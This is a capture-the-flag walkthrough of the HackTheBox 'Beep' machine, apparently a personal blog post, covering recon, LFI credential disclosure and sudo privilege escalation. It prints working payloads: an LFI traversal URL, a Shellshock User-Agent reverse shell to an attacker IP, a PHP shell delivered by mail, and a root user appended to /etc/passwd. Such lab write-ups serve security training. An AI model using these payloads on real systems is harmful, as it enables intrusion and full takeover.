HackTheBox - Beep Walkthrough

July 19, 2019

Beep

Easy linux box with lots of paths to root - LFI with password reusage, LFI to RCE via mail, Shellshock and so on.

1. Recon and Information gathering

Nmap

root@kali:/vagrant/hackthebox/beep# nmap -sV -sC 10.10.10.7 -oN base_tcp.nmap
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-07-17 20:25 EEST
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: EXPIRE(NEVER) APOP LOGIN-DELAY(0) TOP STLS RESP-CODES USER PIPELINING AUTH-RESP-CODE UIDL IMPLEMENTATION(Cyrus POP3 server v2)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ID LITERAL+ ATOMIC CATENATE CHILDREN X-NETSCAPE CONDSTORE LISTEXT URLAUTHA0001 IMAP4 LIST-SUBSCRIBED NO IDLE OK SORT=MODSEQ STARTTLS THREAD=REFERENCES MAILBOX-REFERRALS MULTIAPPEND IMAP4rev1 NAMESPACE ANNOTATEMORE RENAME SORT BINARY UNSELECT RIGHTS=kxte THREAD=ORDEREDSUBJECT ACL QUOTA UIDPLUS Completed
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2019-07-17T17:23:25+00:00; -4m57s from scanner time.
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: -4m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 290.44 seconds

Additionally checking all ports I got some less known open ports:

879/tcp   open  unknown
4190/tcp  open  sieve
4559/tcp  open  hylafax
5038/tcp  open  unknown

Let’s get some more info on them:

root@kali:/vagrant/hackthebox/beep# nmap -sV -sC 10.10.10.7 -p 879,4190,4559,5038 -oN more_tcp.nmap
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-07-18 13:14 EEST
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.036s latency).

PORT     STATE  SERVICE  VERSION
879/tcp  closed unknown
4190/tcp open   sieve    Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4559/tcp open   hylafax  HylaFAX 4.3.10
5038/tcp open   asterisk Asterisk Call Manager 1.1
Service Info: Host: localhost; OS: Unix

Services

HTTP

So I have a “Elastix” app - no idea what it is. Let’s google a bit and see if there’s something interesting.

Okay, so it’s a PBX software - mailing, calls, etc. And dirbusting shows a looot of directories - roundcube, voicemail login, different dirs without indexes, etc.

root@kali:/vagrant/hackthebox/beep# gobuster dir -w /opt/wordlists/directory-medium.txt -u https://10.10.10.7 -k -t 50 -x php,txt,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7
[+] Threads:        50
[+] Wordlist:       /opt/wordlists/directory-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,zip
[+] Timeout:        10s
===============================================================
2019/07/17 21:37:19 Starting gobuster
===============================================================
/images (Status: 301)
/help (Status: 301)
/index.php (Status: 200)
/register.php (Status: 200)
/modules (Status: 301)
/themes (Status: 301)
/mail (Status: 301)
/admin (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/config.php (Status: 200)
/robots.txt (Status: 200)
/var (Status: 301)
/panel (Status: 301)
/libs (Status: 301)
/recordings (Status: 301)
/configs (Status: 301)
<...>

Also I have some vulns from searchsploit, but I need to check them if they can be used:

root@kali:/vagrant/hackthebox/beep# searchsploit elastix
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                             |  Path
                                                                                                                           | (/opt/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                      | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                    | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                              | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                           | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                          | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                         | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                     | exploits/php/webapps/18650.py
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------

Asterisk

The voip service has quite the list of vulns, have to check if they are present on the version the server has.

root@kali:/vagrant/hackthebox/beep# searchsploit Asterisk
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection                                                       | exploits/linux/remote/30677.pl
Asterisk - 'ast_parse_digest()' Stack Buffer Overflow (PoC)                                                                         | exploits/linux/dos/18855.txt
Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access                                                                                | exploits/cgi/webapps/26475.txt
Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)                                                                 | exploits/multiple/dos/2597.pl
Asterisk 1.2.15/1.4.0 - Remote Denial of Service                                                                                    | exploits/multiple/dos/3407.c
Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service                                                                         | exploits/multiple/dos/3566.pl
Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash                                                                 | exploits/multiple/dos/5749.pl
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (1)                                                          | exploits/multiple/dos/29900.txt
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (2)                                                          | exploits/multiple/dos/29901.txt
Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities                                                | exploits/linux/dos/31440.txt
Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service                                                                         | exploits/linux/dos/32095.pl
Asterisk 1.8.4.1 - SIP 'REGISTER' Request User Enumeration                                                                          | exploits/linux/remote/35801.txt
Asterisk 1.8.x - SIP INVITE Request User Enumeration                                                                                | exploits/multiple/remote/35685.txt
Asterisk 1.x - BYE Message Remote Denial of Service                                                                                 | exploits/multiple/dos/30974.txt
Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption                                                                           | exploits/multiple/dos/43992.py
Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash                                                                          | exploits/multiple/dos/4249.rb
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service                                                              | exploits/multiple/dos/4196.c
Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service)                                                         | exploits/multiple/dos/8940.pl
Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities                                                                 | exploits/linux/remote/24221.pl
Asterisk Recording Interface 0.7.15 - 'Audio.php' Information Disclosure                                                            | exploits/multiple/remote/27716.txt
Asterisk Recording Interface 0.7.15/0.10 - Multiple Vulnerabilities                                                                 | exploits/multiple/remote/34301.txt
Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service                                                                             | exploits/linux/dos/44181.py
Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service                                                                           | exploits/linux/dos/44183.py
Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of Service                                                                                | exploits/linux/dos/44182.py
Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption                                                                           | exploits/linux/dos/44184.py
Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting                                                                      | exploits/php/webapps/38375.txt
Fonality trixbox - 'asterisk_info.php' Directory Traversal                                                                          | exploits/php/webapps/39349.txt
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------

Webmin

For webmin we have shellshock to try (hello cgi!)..

2. Initial foothold/low priv access.

The easiest way is to use the LFI vuln in vtigercrm - exploits/php/webapps/37637.pl

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action

HTTP/1.1 200 OK
Date: Fri, 19 Jul 2019 13:12:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13779


AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE


AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin

AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin 

FOPWEBROOT=/var/www/html/panel
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin

ARI_ADMIN_PASSWORD=jEhdIekWmdjE

AUTHTYPE=database

ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asterisk
Sorry! Attempt to access restricted file.


https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin spamfilter:x:500:500::/home/spamfilter:/bin/bash haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin fanis:x:501:501::/home/fanis:/bin/bash 
Sorry! Attempt to access restricted file.

https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&action
<...> 
Sorry! Attempt to access restricted file.

Tried connecting to mysql with the credentials I found with the LFI, but no luck:

root@kali:/vagrant/hackthebox/beep# mysql -u asteriskuser -h 10.10.10.7 -p
Enter password: 
ERROR 1130 (HY000): Host '10.10.14.25' is not allowed to connect to this MySQL server

aand… trying the users from /etc/passwd with the passwords with ssh i get a match for root…:

root@kali:/vagrant/hackthebox/beep# ssh root@10.10.10.7
root@10.10.10.7's password: 
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep ~]# cat /root/root.txt 
<...>

Damn password reusage :/

Shellshock

I modified the User-Agent and used the /dev/tcp shell for a blind shellshock:

GET / HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :;}; bash -i >& /dev/tcp/10.10.14.25/4848 0>&1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ARI=r5hkca7mh8ln12n4la4o8neat1; PHPSESSID=737p48sdv47673q4m1l3mlppd7; elastixSession=3lj6vt1946kqiliifee0655ra2; testing=1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


root@kali:/vagrant/hackthebox/beep# nc -lvnp 4848
listening on [any] 4848 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.7] 58740
bash: no job control in this shell
[root@beep webmin]# id
uid=0(root) gid=0(root)

SMTP + LFI

Maybe the coolest way to pwn the box - ofc thanks to ippsec:

root@kali:/vagrant/hackthebox/beep# sendemail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s 10.10.10.7:25 -f flame_n@htb.eu
Jul 19 15:12:14 kali sendemail[11143]: Email was sent successfully!

Start a netcat listener, then open https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action aaand - profit!

root@kali:/vagrant/hackthebox/beep# nc -lvnp 4949
listening on [any] 4949 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.7] 35358
Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux
 22:08:39 up  5:00,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
sh: no job control in this shell
sh-3.2$ 

3. Privilege Escalation

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

Okay… lots of tricks here… nmap, chown, chmod, etc.:

Chown

bash-3.2$ sudo chown asterisk:asterisk /etc/passwd
bash-3.2$ echo "flame:sa/zAjIC0QWtk:0:0::/root/:/bin/bash" >> /etc/passwd
echo "flame:sa/zAjIC0QWtk:0:0::/root/:/bin/bash" >> /etc/passwd

bash-3.2$ su - flame
su - flame
Password: flamen

[root@beep ~]# id
id
uid=0(root) gid=0(root) groups=0(root)

Nmap

bash-3.2$ sudo nmap --interactive
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Service

bash-3.2$ sudo /sbin/service ../../../bin/bash
sudo /sbin/service ../../../bin/bash
[root@beep /]# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

And so on, check out the good folks at https://gtfobins.github.io/

Overall cool machine - easy, but still great playground for testing different paths to root.